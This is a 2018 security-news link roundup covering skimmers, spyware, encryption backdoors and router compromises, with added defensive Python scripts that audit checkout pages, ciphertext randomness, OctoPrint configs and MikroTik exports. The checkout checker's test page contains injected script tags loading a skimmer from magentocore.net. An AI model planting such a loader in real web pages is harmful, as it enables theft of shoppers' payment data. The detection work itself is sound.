“Law enforcement agencies in our countries need technology providers to assist with the execution of lawful orders,” the group said.
Tomi Engdahl says:
Remote Mac Exploitation Via Custom URL Schemes
an offensive cyber-espionage campaign infects macs with a novel infection mechanism
https://objective-see.com/blog/blog_0x38.html
Tomi Engdahl says:
Exclusive: U.S. accuses China of ‘super aggressive’ spy campaign on LinkedIn
https://www.reuters.com/article/us-linkedin-china-espionage-exclusive/exclusive-chief-u-s-spy-catcher-says-china-using-linkedin-to-recruit-americans-idUSKCN1LG15Y
The United States’ top spy catcher said Chinese espionage agencies are using fake LinkedIn accounts to try to recruit Americans with access to government and commercial secrets, and the company should shut them down.
Tomi Engdahl says:
Philips Reports Its Own Device For Nine Security Vulnerabilities
https://www.bleepingcomputer.com/news/security/philips-reports-its-own-device-for-nine-security-vulnerabilities/
Philips evaluated one of its products and discovered that it was vulnerable to nine different security bugs, one of them of critical severity.
An advisory from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) on Thursday describes the vulnerabilities in Philips e-Alert Unit, warning that the device is exploitable remotely if exposed to the internet, or from the local network.
The horde of security flaws affects versions R2.1 and earlier of the product. Their severity ratings range from medium, for exposing information about the operating system and software components, to critical, for hardcoded credentials.
The e-Alert Unit from Philips is a solution that monitors the performance of medical imaging systems. It is not a medical device in itself but it alerts when key parameters on MRI machines are amiss.
Tomi Engdahl says:
CryptoNar Ransomware Discovered and Quickly Decrypted
https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/
This week a new CryptoJoker ransomware variant was discovered called CryptoNar that has infected victims. The good news, is that a free decryptor was quickly released so that these victims can get their files back for free.
Tomi Engdahl says:
MagentoCore Malware Found on 7,339 Magento Stores
https://www.bleepingcomputer.com/news/security/magentocore-malware-found-on-7-339-magento-stores/
A Dutch security researcher has lifted the veil on a massive website hacking campaign that has infected 7,339 Magento stores with a script that collects payment card data from people shopping on the sites.
The script is what industry experts call a “payment card scraper” or “skimmer.” Hackers breach sites and modify their source code to load the script along with its legitimate files.
The script usually loads on store checkout pages and secretly records payment card details entered in payment forms, data that it later sends to a server under the hacker’s control.
MagentoCore — the most fertile payment skimmer to date
According to de Groot, this is “the most successful to date.”
The researcher says he found the script — which he named MagentoCore — on 7,339 Magento stores in the past six months.
“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.”
A quick PublicWWW search reveals that the MagentoCore script can still be found on 5,172 domains today, at the time of writing.
MagentoCore operated by one of the three MageCart groups
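The skimmer described above (and in the de Groot write-up summarised earlier on this page) works by getting an extra script loaded on the checkout page that phones home to an attacker host. A store operator can catch that class of modification by diffing the scripts a checkout page actually loads against an allowlist of hosts the shop is supposed to use. The following is an added detection example, not de Groot's scanner or any Magento code; the sample page, the shop host `js.example-shop.com` and the `find_unexpected_scripts` function are constructed for this illustration (the `magentocore.net` host is the one named on this page).

```python
"""Flag <script> tags on a checkout page that load from, or call out to,
hosts outside an allowlist.  Added example; not de Groot's or Magento's code."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collect external script srcs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


_URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)


def _host(url):
    # urlparse handles absolute and protocol-relative ("//host/x") URLs;
    # a same-origin relative path has no hostname and is not flagged.
    return (urlparse(url).hostname or "").lower()


def find_unexpected_scripts(html, allowed_hosts):
    """Return (kind, url) pairs for scripts that reference hosts outside
    allowed_hosts: 'external-script' for a src attribute, 'inline-callout'
    for a URL embedded in an inline script body."""
    allowed = {h.lower() for h in allowed_hosts}
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.srcs:
        h = _host(src)
        if h and h not in allowed:
            findings.append(("external-script", src))
    for body in p.inline:
        for url in _URL_RE.findall(body):
            h = _host(url)
            if h and h not in allowed:
                findings.append(("inline-callout", url))
    return findings


# Constructed checkout page: two legitimate scripts plus an injected loader
# and an inline stub that pulls the same third-party script dynamically.
ALLOWED_HOSTS = {"js.example-shop.com"}  # hypothetical shop CDN
SAMPLE_CHECKOUT = """<html><head>
<script src="/static/frontend/Magento/luma/en_US/mage/mage.js"></script>
<script src="https://js.example-shop.com/checkout.js"></script>
<script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>
<script>
  var s = document.createElement("script");
  s.src = "https://magentocore.net/mage/mage.js";
  document.head.appendChild(s);
</script>
</head><body><form id="checkout"></form></body></html>"""

if __name__ == "__main__":
    for kind, url in find_unexpected_scripts(SAMPLE_CHECKOUT, ALLOWED_HOSTS):
        print(f"{kind}: {url}")
```

Run it against a fetched copy of every checkout and payment page on a schedule and alert on any new host; a legitimate change to the shop's script set should be rare enough that each alert is worth a human look. The allowlist approach catches the skimmer whatever domain it uses, which matters because the campaign above moved between hosts over time.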
Tomi Engdahl says:
Cobalt Hacking Group Tests Banks In Russia and Romania
https://www.bleepingcomputer.com/news/security/cobalt-hacking-group-tests-banks-in-russia-and-romania/
In new spear-phishing campaigns observed this month, the Cobalt hacking group targeted banks in Russia and Romania with emails containing two payloads pointing to two different command and control servers.
Cobalt is a cybercrime gang that has been operating since at least 2016 and specializes in targeting financial organizations. According to data from Europol, the group is tied to cyberattacks against at least 100 banks across the world, stealing about one billion euros from them.
Although the alleged ringleader has been arrested in Spain this year, and three individuals believed to be members of the hacking crew have been charged at the beginning of the month, the group continues to operate.
Phishing email uses domain similar to financial organization
Tomi Engdahl says:
https://www.tivi.fi/Kaikki_uutiset/kiinalaiset-verkkotoimittajat-herattavat-epailyksia-ympari-maailman-nyt-huolestui-japani-6738864
Tomi Engdahl says:
http://www.etn.fi/index.php/13-news/8374-useimmista-androideista-loytyi-taas-haavoittuvuus
Tomi Engdahl says:
Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers
https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html
Doctors and scientists say microwave strikes may have caused sonic delusions and very real brain damage among embassy staff and family members.
Tomi Engdahl says:
New York Times:
In lawsuits against Israeli hacking tools maker NSO Group, which claims to not spy with its tools, court docs allegedly show it snooping on calls to close sales
Hacking a Prince, an Emir and a Journalist to Impress a Client
https://www.nytimes.com/2018/08/31/world/middleeast/hacking-united-arab-emirates-nso-group.html
The rulers of the United Arab Emirates had been using Israeli spyware for more than a year, secretly turning the smartphones of dissidents at home or rivals abroad into surveillance devices.
So when top Emirati officials were offered a pricey update of the spying technology, they wanted to make sure it worked, according to leaked emails submitted Thursday in two lawsuits against the spyware’s maker, the Israel-based NSO Group.
Could the company secretly record the phones of the emir of Qatar, a regional rival, the Emiratis asked? How about the phone of a powerful Saudi prince who directed the kingdom’s national guard? Or what about recording the phone of the editor of a London-based Arab newspaper?
“Please find two recordings attached,” a company representative wrote back four days later, according to the emails.
The NSO Group’s actions are now at the heart of the twin lawsuits accusing the company of actively participating in illegal spying — part of a global effort to confront the growing arms race in the world of spyware.
As private companies develop and sell cutting-edge surveillance technology to governments for tens of millions of dollars, human rights groups say the scant oversight over the practice invites rampant misuse.
Tomi Engdahl says:
Rebecca Hill / The Register:
Communiqué from Five Eyes nations tells tech industry to make accommodations on encryption, or legislative or enforcement actions may be taken for lawful access — Five Eyes to tech: We have ways of making you comply — The Five Eyes nations have told the tech industry …
https://www.theregister.co.uk/2018/08/31/five_eyes_2018_meeting_encryption_terrorist_content/
Tomi Engdahl says:
Wall Street Journal:
Google starts purging ads by scammers masquerading as authorized service agents for companies like Apple after a WSJ inquiry
Tech-Support Scams Prompt Google to Act
https://www.wsj.com/articles/tech-support-scams-on-google-trigger-crackdown-1535755023
Wall Street Journal investigation finds fraudsters use Google search ads to masquerade as authorized service agents for companies such as Apple
Tomi Engdahl says:
‘Five Eyes’ governments call on tech giants to build encryption backdoors — or else
https://techcrunch.com/2018/09/03/five-eyes-governments-call-on-tech-giants-to-build-encryption-backdoors-or-else/?sr_share=facebook&utm_source=tcfbpage
A pact of five nation states dedicated to a global “collect it all” surveillance mission has issued a memo calling on their governments to demand tech companies build backdoor access to their users’ encrypted data — or face measures to force companies to comply
Tomi Engdahl says:
Hacking a Prince, an Emir and a Journalist to Impress a Client
https://www.nytimes.com/2018/08/31/world/middleeast/hacking-united-arab-emirates-nso-group.html
The rulers of the United Arab Emirates had been using Israeli spyware for more than a year, secretly turning the smartphones of dissidents at home or rivals abroad into surveillance devices.
So when top Emirati officials were offered a pricey update of the spying technology, they wanted to make sure it worked, according to leaked emails submitted Thursday in two lawsuits against the spyware’s maker, the Israel-based NSO Group.
Could the company secretly record the phones of the emir of Qatar, a regional rival, the Emiratis asked?
Tomi Engdahl says:
Alleged ‘Satori’ IoT Botnet Operator Sought Media Spotlight, Got Indicted
https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/
A 20-year-old from Vancouver, Washington was indicted last week on federal hacking charges and for allegedly operating the “Satori” botnet, a malware strain unleashed last year that infected hundreds of thousands of wireless routers and other “Internet of Things” (IoT) devices. This outcome is hardly surprising given that the accused’s alleged alter ego has been relentless in seeking media attention for this global crime machine.
“Despite the havoc he supposedly wreaked, the accused hacker doesn’t seem to have been terribly knowledgeable about hacking,” Poulsen notes.
Schuchman reportedly went by the handle “Nexus Zeta,” the nickname used by a fairly inexperienced and clumsy ne’er-do-well who has tried on multiple occasions to get KrebsOnSecurity to write about the Satori botnet. In January 2018, Nexus Zeta changed the login page for his botnet control panel that he used to remotely control his hacked routers to include a friendly backhanded reference to this author
Nexus Zeta clearly had limited hacking skills initially and almost no operational security. Indeed, his efforts to gain notoriety for his illegal hacking activities eventually earned him just that, as it usually does.
Tomi Engdahl says:
Google cracks down on dodgy tech support ads
Verification programme aims to weed out the miscreants
https://www.theregister.co.uk/2018/09/03/tech_support_ads/
Google has placed restrictions on tech support ads after admitting it’s increasingly hard to tell promos for legit services from deceptions.
Tomi Engdahl says:
Google’s Doors Hacked Wide Open By Own Employee
https://www.forbes.com/sites/thomasbrewster/2018/09/03/googles-doors-hacked-wide-open-by-own-employee/amp/
Last July, in Google’s Sunnyvale offices, a hacker found a way to trick doors into opening without the requisite RFID keycard. Luckily for Google, it was David Tomaschik, an employee at the tech giant, who only had good intentions.
When he sent his malicious code across the Google network, he saw the lights turn from red to green on the door to his office. Then came the satisfying thunk as the lock opened. It was the culmination of work in which Tomaschik had uncovered vulnerabilities in technology made by Software House, the creator of the office controllers managing the physical security of the California site.
Last summer, when Tomaschik looked at the encrypted messages the Software House devices (called iStar Ultra and IP-ACM) were sending across the Google network, he discovered they were non-random; encrypted messages should always look random if they’re properly protected. He was intrigued and digging deeper discovered a “hardcoded” encryption key was used by all Software House devices. That meant he could effectively replicate the key and forge commands, such as those asking a door to unlock. Or he could simply replay legitimate unlocking commands, which had much the same effect.
Tomaschik also discovered he could do all this without any record of his actions. And he could prevent legitimate Google employees from opening doors. “Once I had my findings it became a priority. It was pretty bad,” he told Forbes. Google then moved quickly to prevent attacks on its offices, according to Tomaschik.
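The tell in the story above was that the "encrypted" door-controller traffic did not look random, and that the same command produced the same bytes every time, which is what made replay possible. Both properties are cheap to test for from a packet capture before anyone reverse-engineers a key. The block below is an added illustration, not Tomaschik's or Software House's code: it measures byte entropy, counts repeated 16-byte blocks (the AES block size, where repeats suggest ECB or a fixed key and IV), and looks for identical ciphertexts recurring across messages. The sample payloads are constructed with a SHA-256 counter so the run is deterministic.

```python
"""Sanity checks over captured 'encrypted' payloads.  Properly encrypted
traffic should be indistinguishable from random bytes and the same command
should never produce the same ciphertext twice.  Added example code."""
import hashlib
import math
from collections import Counter

BLOCK = 16  # AES block size; repeats at this granularity suggest ECB / fixed IV
MIN_LEN_FOR_ENTROPY = 1024  # below this a byte-entropy figure is not meaningful


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 is the ideal for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def repeated_blocks(data: bytes, block: int = BLOCK) -> int:
    """Number of block-sized chunks that duplicate an earlier chunk."""
    chunks = [data[i:i + block] for i in range(0, len(data) - block + 1, block)]
    return len(chunks) - len(set(chunks))


def assess_payload(data: bytes) -> dict:
    ent = shannon_entropy(data)
    dup = repeated_blocks(data)
    low_entropy = len(data) >= MIN_LEN_FOR_ENTROPY and ent < 7.0
    return {"entropy": ent, "repeated_blocks": dup,
            "suspicious": low_entropy or dup > 0}


def repeated_messages(messages) -> list:
    """Ciphertexts seen more than once across captures.  With a nonce, IV or
    counter in use, two encryptions of the same command must differ; identical
    messages mean the protocol is open to replay."""
    counts = Counter(messages)
    return [m for m, c in counts.items() if c > 1]


# --- constructed samples (deterministic stand-ins for captured traffic) ---
def _prng(seed: bytes, n: int) -> bytes:
    out = b""
    i = 0
    while len(out) < n:
        out += hashlib.sha256(seed + i.to_bytes(4, "big")).digest()
        i += 1
    return out[:n]


GOOD_SAMPLE = _prng(b"good", 4096)          # what sound ciphertext looks like
_block_a = _prng(b"unlock", BLOCK)
_block_b = _prng(b"door-7", BLOCK)
BAD_SAMPLE = _block_a * 12 + _block_b * 4   # same plaintext block -> same ciphertext block

# Four captured messages; the second and fourth are byte-identical.
CAPTURES = [_prng(b"msg1", 48), BAD_SAMPLE[:48], _prng(b"msg3", 48), BAD_SAMPLE[:48]]

if __name__ == "__main__":
    print("good:", assess_payload(GOOD_SAMPLE))
    print("bad: ", assess_payload(BAD_SAMPLE))
    print("replayable messages:", len(repeated_messages(CAPTURES)))
```

The entropy test needs a few kilobytes of data to say anything; for the short command frames a door controller sends, the repeated-block and repeated-message checks are the useful ones. Either result is a reason to ask the vendor how keys and IVs are managed, not proof of a specific flaw.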
Tomi Engdahl says:
These People Were Just Trying To Get To Maui When They Got On A Horrible Flight Where Everything Went Wrong
https://www.buzzfeednews.com/article/mbvd/these-people-were-just-trying-to-get-to-maui-when-they-got
A flight from Oakland to Maui was delayed about 90 minutes because of a fake crime-scene photo. And because that apparently wasn’t enough airplane drama for one morning, the crew had to declare an emergency while airborne because pepper spray filled the cabin.
Hawaiian Airlines Flight 23 was originally set to take off Friday morning and was already taxiing when multiple passengers alerted the crew that they had received a horrifying photo of what appeared to be a dead child facedown in a crime scene with numerical markers.
At least 15 passengers were sent the gruesome photo
It turned out that the photo came from a 15-year-old girl who was trying to send an image from her high school medical-biology class to her mother, who was sitting next to her, but accidentally AirDropped the photo to the other passengers around her. AirDrop allows the instant transfer of files among supported Apple devices, like iPhones and iPads, as long as the option is turned on. The “dead” child in the image was actually a mannequin.
“She was telling her mom about the class, and her mom supposedly just got a new iPhone,” Kelly said. “People were a little alarmed by it.”
The girl and her mother were not allowed to continue on the flight and were rebooked on a flight Saturday, Kelly said. They were questioned by officers from the Alameda County Sheriff’s Office, who determined that there was no actual crime.
“Obviously, it inconvenienced some folks,”
Tomi Engdahl says:
How Cybercriminals Are Using Blockchain to Their Advantage
https://www.securityweek.com/how-cybercriminals-are-using-blockchain-their-advantage
Cybercriminals Have Been Experimenting With a Blockchain Domain Name System (DNS)
The takedowns of AlphaBay and Hansa in 2017 by law enforcement gave rise to much speculation about the future of dark web marketplaces. As I’ve discussed before, an environment of fear and mistrust is driving the cybercriminal community to incorporate alternative technologies to improve security and remain below the radar as they conduct illicit business online. One such technology is blockchain.
When most people hear the term “blockchain” they typically think of cryptocurrencies and other applications where transactions and interactions among a community of users must be executed with a high degree of trust, efficiency and transparency. However, if we consider the recent challenges that administrators of online criminal forums have encountered, it only makes sense that they would explore applications for blockchain. To that end, some have been experimenting with a blockchain domain name system (DNS) as a way of hiding their malicious activity and bullet-proofing their offerings.
A blockchain DNS is different from a traditional DNS. Typically, when we type a website into an Internet browser, a computer will query a DNS server for an IP address. Essentially, this is the Internet equivalent of a phone book.
Decentralized DNS offers many benefits such as countering censorship by authorities (for example if a government orders all Internet Service Providers in a country to stop redirecting domains to a relevant IP address), or preventing DNS spoofing, where attackers can insert corrupt DNS data so that the name server returns an incorrect IP address and redirects traffic to an attacker computer. However, decentralized DNS can also be abused by attackers for malicious purposes. As blockchain domains do not have a central authority and registrations contain unique encrypted hashes rather than an individual’s name and address, it is harder for law enforcement to perform site takedowns. The following are just a few examples of bad actors using blockchain.
Back in January 2016, one of the first groups to employ blockchain DNS to create a .bazar domain in an attempt to better secure their operations was a group known as The Money Team. In July 2017, the Joker’s Stash, a popular Automated Vending Cart (AVC) site used to purchase stolen payment card details, began using blockchain DNS alongside its established Tor (.onion) domain.
Blockchain technology has also allowed users to realize alternative models for online marketplaces. The site known as Tralfamadore, for example, uses blockchain as its back-end to store the necessary databases and code to support front-end user interfaces.
As cybersecurity professionals, we should continue to monitor for an uptick in the adoption of blockchain for the buying and selling of illicit goods. And while we’re at it, we should also continue to assess other emerging technologies that could be used for nefarious purposes.
Tomi Engdahl says:
Critical Vulnerability Patched in PHP Package Repository
https://www.securityweek.com/critical-vulnerability-patched-php-package-repository
A critical remote code execution vulnerability was recently addressed in packagist.org, a large PHP package repository, a security researcher reveals.
An open source project, Packagist is the default package server behind Composer, a tool for dependency management in PHP, as it aggregates public PHP packages installable with the utility. The packagist.org site helps users search for packages and lets Composer know where to get the code from.
Tomi Engdahl says:
New lawsuit shows your phone is unsafe at American borders
CBP = Customs and Border Profiling
https://www.engadget.com/2018/08/31/new-lawsuit-shows-your-phone-is-unsafe-at-american-borders/
A recent case filed in federal court, in which an American woman had her iPhone seized and cracked by Customs and Border Protection in a New Jersey airport puts a whole new spin on the things we now need to worry about when leaving the country. It appears that now everyone’s phones, despite country of origin or cause, are subject to nonconsensual seizure and search — even if we refuse to give up our passwords.
If you’re not caught up on the story, news hit this week that a Staten Island mom coming home from a February trip with her 9-year-old daughter from Switzerland had her iPhone snatched, kept for months and accessed for no given reason.
Tomi Engdahl says:
Cryptojacking isn’t a path to riches – payout is a lousy $5.80 a day
Hackers shouldn’t quit their day scams if they want to eat
https://www.theregister.co.uk/2018/08/30/cryptojacking_pays_poorly/
Cryptojacking, the hijacking of computing resources to mine cryptocurrency, turns out to be both relatively widespread and not particularly profitable, according to a paper published by code boffins from Braunschweig University of Technology in Germany.
In a paper distributed via ArXiv, researchers Marius Musch, Christian Wressnegger, Martin Johns, and Konrad Rieck analyzed the prevalence of cryptomining on websites and found that 1 out of every 500 of the top million Alexa-ranked sites hosts cryptojacking code.
Where cryptocurrencies like Bitcoin depend on CPU cycles for solving the computational puzzles that generate currency, cryptocurrencies like Monero, Bytecoin, and Electroneum rely on memory resources. Commodity hardware can’t compete with GPUs and ASICs in the computation of Bitcoin hashes, but it can help churn out memory-bound calculations.
https://arxiv.org/pdf/1808.09474.pdf
Tomi Engdahl says:
Google’s Titan Security Key Explained | CNBC
https://www.youtube.com/watch?v=2d_pwtUcPIk
Google’s new $50 Titan Security Key adds extra security to your account, and helps protect Facebook, Dropbox and other services, too, as long as you don’t lose it. CNBC’s Todd Haselton puts it to the test.
Google’s new $50 Titan Security Key adds extra security to your account, and helps protect Facebook, Dropbox and other services from phishing attacks… as long as you don’t lose it.
Tomi Engdahl says:
This is Google’s Titan security key
https://techcrunch.com/2018/08/30/this-is-googles-titan-security-key/?guccounter=1
“We have had no reported or confirmed account takeovers since implementing security keys at Google,” a spokesperson told TechCrunch.
And it’s probably true. Think of a security key as like a two-factor authentication code that’s sent to your phone — but instead a USB stick in your pocket. Two-factor authentication is stronger than just a username and password, but text message codes can be intercepted and many sites and services don’t yet support the stronger authenticator codes.
What to know about Google’s Titan security key
https://www.washingtonpost.com/technology/2018/08/31/what-know-about-googles-titan-security-key/?noredirect=on&utm_term=.553a80c98993
Google on Thursday began selling a new piece of hardware called the Titan security key, which is designed to add another layer of protection for online security. But the company has faced criticism for producing the key in China through a partnership with manufacturer Feitian, according to a report from CNBC.
The product is labeled as being “Produced in China,” meaning, like many consumer electronics, that the security key is manufactured there. Some security experts, such as Adam Meyers at the security firm CloudStrike who was interviewed by the Information, say that having production overseas leaves Google open to infiltration by hackers or even the Chinese government during the assembly process.
Tomi Engdahl says:
Thousands of misconfigured 3D printers on interwebz run risk of sabotage
Security controls aren’t there to just look pretty, you know
https://www.theregister.co.uk/2018/09/04/3d_printers_hackable/
Internet-connected 3D printers are at risk of being tampered with or even sabotaged because users fail to apply security controls, a researcher has warned.
Xavier Mertens, a senior handler for the SANS Internet Storm Center (ISC) and freelance cybersecurity consultant, found more than 3,700 3D printers directly connected to the internet.
“These printers are controlled using the open source software package ‘OctoPrint’ but it’s likely there are other tools that are similarly affected. OctoPrint is not meant to be exposed in this way, and it explains in its documentation how to deploy the software in a safe way,” Mertens explained.
Many OctoPrint instances are not properly configured and do not enforce authentication, so an attacker would be able to download the files that describe parts being printed.
An attacker would also be able to swap out these files, replacing them with files that describe similar parts that are “weakened” to produce substandard or unsafe parts.
The problem here is users going out of their way to expose internal services on the public net.
“There’s no way to prevent people from exposing internal services on the net. I try to educate, I’m working on yet another prominent warning, but I can’t force people to perform proper (and inconvenient) network security.”
Some printers do not have safety switches to prevent them from overheating, which means an attacker could attempt to start a fire by uploading a malicious file.
https://isc.sans.edu/forums/diary/3D+Printers+in+The+Wild+What+Can+Go+Wrong/24044/
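The safe deployment Mertens refers to comes down to two settings in OctoPrint's config.yaml: whether access control is enabled and which address the server listens on. The script below is an added example for auditing your own instance's config file, not code from OctoPrint or from the ISC diary. The config sample is constructed, and the key names (accessControl.enabled, server.host, server.port) are assumed from OctoPrint's documented config.yaml layout; the parser handles only the two-level subset used in that sample.

```python
"""Flag the two OctoPrint config.yaml settings that turn an exposed
printer into an unauthenticated one.  Added example; the sample config
is constructed and the key names are assumed from OctoPrint's docs."""

# Constructed sample of a misconfigured config.yaml (illustrative only).
SAMPLE_CONFIG = """\
accessControl:
  enabled: false        # assumed key: authentication switched off
server:
  host: 0.0.0.0         # assumed key: listen on every interface
  port: 5000
"""


def parse_simple_yaml(text):
    """Parse the 'section:' / '  key: value' subset used in SAMPLE_CONFIG.

    Comments are stripped, true/false/yes/no become bools and integers
    are converted; anything deeper than two levels is out of scope.
    """
    data, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        value = value.strip().strip("'\"")
        if indent == 0:
            section = key
            data[section] = {}
        elif section is not None:
            low = value.lower()
            if low in ("true", "yes"):
                value = True
            elif low in ("false", "no"):
                value = False
            elif value.isdigit():
                value = int(value)
            data[section][key] = value
    return data


def audit_octoprint(cfg):
    """Return human-readable findings for a parsed config dict."""
    findings = []
    if cfg.get("accessControl", {}).get("enabled") is False:
        findings.append(
            "accessControl.enabled is false: anyone who can reach the port "
            "can read and replace print files")
    host = cfg.get("server", {}).get("host")
    if host in ("0.0.0.0", "::"):
        findings.append(
            "server.host binds every interface: acceptable on a private LAN, "
            "not when the port is forwarded from the internet")
    return findings


def audit_config_text(text):
    """Convenience wrapper: parse then audit."""
    return audit_octoprint(parse_simple_yaml(text))


if __name__ == "__main__":
    for finding in audit_config_text(SAMPLE_CONFIG) or ["no findings"]:
        print("-", finding)
```

Run it against the real file (normally ~/.octoprint/config.yaml) by reading it into `audit_config_text`; an empty result means both checks passed, which still says nothing about what the router in front of the printer forwards.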
Tomi Engdahl says:
7,500+ MikroTik Routers Are Forwarding Owners’ Traffic to the Attackers, How is Yours?
https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours-en/
Each RouterBOARD device runs the RouterOS software system.[1]
According to WikiLeaks, the CIA Vault7 hacking tool Chimay Red involves 2 exploits, including Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.[2]
Both Winbox and Webfig are RouterOS management components.
Since Mid-July, our Anglerfish Honeypot System has been picking up malware exploiting the above MikroTik CVE-2018-14847 vulnerability to perform various malicious activities.
What’s more, we have observed a massive number of victims having their Socks4 proxy enabled on the device by one single malicious actor.
More interestingly, we also discovered that more than 7,500+ victims are being actively eavesdropped, with their traffic being forwarded to IPs controlled by unknown attackers.
Vulnerable Devices
From our own scan result, we logged more than 5,000K devices with open TCP/8291 port, and 1,200k of them were identified as Mikrotik devices, within which 370k (30.83%) are CVE-2018-14847 vulnerable.
The Attacks
CoinHive Mining Code Injection
Sock4 Proxy and the Mysterious 95.154.216.128/25
Eavesdropping
Suggestions
We recommend that MikroTik RouterOS users update the software system in a timely manner, and check whether the http proxy, Socks4 proxy and network traffic capture function are being maliciously exploited by attackers.
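The three things the post tells RouterOS owners to check (HTTP proxy, Socks4 proxy and traffic capture) all show up in the text that `/export` prints on the device. The script below is an added example, not code from netlab 360 or MikroTik, that scans such a dump for those indicators. The export sample is constructed, and the address in it is a documentation range (203.0.113.0/24), not attacker infrastructure; "external" is defined relative to the router's own `/ip address` networks rather than by a fixed private-range list.

```python
"""Scan a RouterOS '/export' dump for the post-compromise settings the
netlab 360 post describes: Socks4 proxy enabled, HTTP proxy enabled, and
'/tool sniffer' streaming packets to an address outside the router's own
networks.  Added example; the sample export is constructed."""
import ipaddress
import re

# Constructed sample of '/export' output on a compromised-looking device.
SAMPLE_EXPORT = """\
# constructed sample, not a real device
/ip address
add address=192.168.88.1/24 interface=bridge network=192.168.88.0
/ip proxy
set enabled=yes port=8080
/ip socks
set enabled=yes port=4153
/tool sniffer
set filter-stream=yes streaming-enabled=yes streaming-server=203.0.113.10
"""

KV = re.compile(r"(\S+?)=(\S+)")


def parse_export(text):
    """Return {section: [entry, ...]} where each entry is the key=value
    map of one 'set' or 'add' line under that section header."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            current = line
            sections.setdefault(current, [])
            continue
        if current is None:
            continue
        verb, _, rest = line.partition(" ")
        if verb in ("set", "add"):
            sections[current].append(dict(KV.findall(rest)))
    return sections


def own_networks(sections):
    """Networks the router itself is addressed on, from '/ip address'."""
    nets = []
    for entry in sections.get("/ip address", []):
        try:
            nets.append(ipaddress.ip_interface(entry["address"]).network)
        except (KeyError, ValueError):
            continue
    return nets


def is_external(addr, nets):
    """True unless addr falls inside one of the router's own networks."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return True  # a hostname: cannot vouch for it, treat as external
    return not any(ip in net for net in nets)


def audit(sections):
    """Return findings for the three indicators named in the post."""
    findings, nets = [], own_networks(sections)
    for e in sections.get("/ip socks", []):
        if e.get("enabled") == "yes":
            findings.append("socks4 proxy enabled on port %s" % e.get("port", "?"))
    for e in sections.get("/ip proxy", []):
        if e.get("enabled") == "yes":
            findings.append("http proxy enabled on port %s" % e.get("port", "?"))
    for e in sections.get("/tool sniffer", []):
        if e.get("streaming-enabled") == "yes":
            server = e.get("streaming-server", "?")
            where = "external" if is_external(server, nets) else "internal"
            findings.append("sniffer streaming to %s address %s" % (where, server))
    return findings


def audit_export(text):
    """Convenience wrapper: parse the dump, then audit it."""
    return audit(parse_export(text))


if __name__ == "__main__":
    for finding in audit_export(SAMPLE_EXPORT) or ["no findings"]:
        print("-", finding)
```

Any of these settings may be legitimate on a given router, so the output is a list to compare against your own baseline, not a verdict; a proxy you never configured, or sniffer streaming to an address you do not recognise, is the case the post is warning about.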
Tomi Engdahl says:
US Court of Appeals: An IP address isn’t enough to identify a pirate
https://www.techspot.com/news/76190-us-court-appeals-ip-address-isnt-enough-identify.html
Copyright owners will need more if they want a successful legal case
Why it matters: Judge rules that copyright trolls need more than just an IP address if they want to go after copyright infringement. An IP is not enough proof to tie a person to a crime.
Tomi Engdahl says:
Wall Street Journal:
Wall Street Journal survey: after the Atlanta ransomware attack, a majority of the 25 largest US cities have or are looking to buy cybersecurity insurance
More U.S. Cities Brace for ‘Inevitable’ Hackers
Majority of top 25 U.S. cities have, or are looking to buy, cybersecurity insurance
https://www.wsj.com/articles/more-cities-brace-for-inevitable-cyberattack-1536053401
Tomi Engdahl says:
SONARSNOOP
Researchers Used Sonar Signal From a Smartphone Speaker to Steal Unlock Passwords
https://motherboard.vice.com/en_us/article/kzyd4m/researchers-used-sonar-signal-from-a-smartphone-speaker-to-steal-unlock-passwords
Researchers at Lancaster University have used an active acoustic side-channel attack to steal smartphone passwords for the first time.
On Thursday, a group of researchers from Lancaster University posted a paper to arXiv that demonstrates how they used a smartphone’s microphone and speaker system to steal the device’s unlock pattern.
Although the average person doesn’t have to worry about getting hacked this way any time soon, the researchers are the first to demonstrate that this kind of attack is even possible. According to the researchers, their “SonarSnoop” attack decreases the number of unlock patterns an attacker must try by 70 percent and can be performed without the victim ever knowing they’re being hacked.
SonarSnoop exploits secondary information that will also reveal the password—in this case, the acoustic signature from entering the password on the device.
“SonarSnoop is applicable in any environment where microphones and speakers can interact.”
The attack begins when a user unwittingly installs a malicious application on their phone. When a user downloads the infected app, their phone begins broadcasting a sound signal that is just above the human range of hearing. This sound signal is reflected by every object around the phone, creating an echo. This echo is then recorded by the phone’s microphone.
By calculating the time between the emission of the sound and the return of its echo to the source, it is possible to determine the location of an object in a given space and whether that object is moving—this is known as sonar.
Tomi Engdahl says:
How refusing to give police your Facebook password can lead to prison
https://nakedsecurity.sophos.com/2018/09/04/how-refusing-to-give-police-your-facebook-password-can-lead-to-prison/
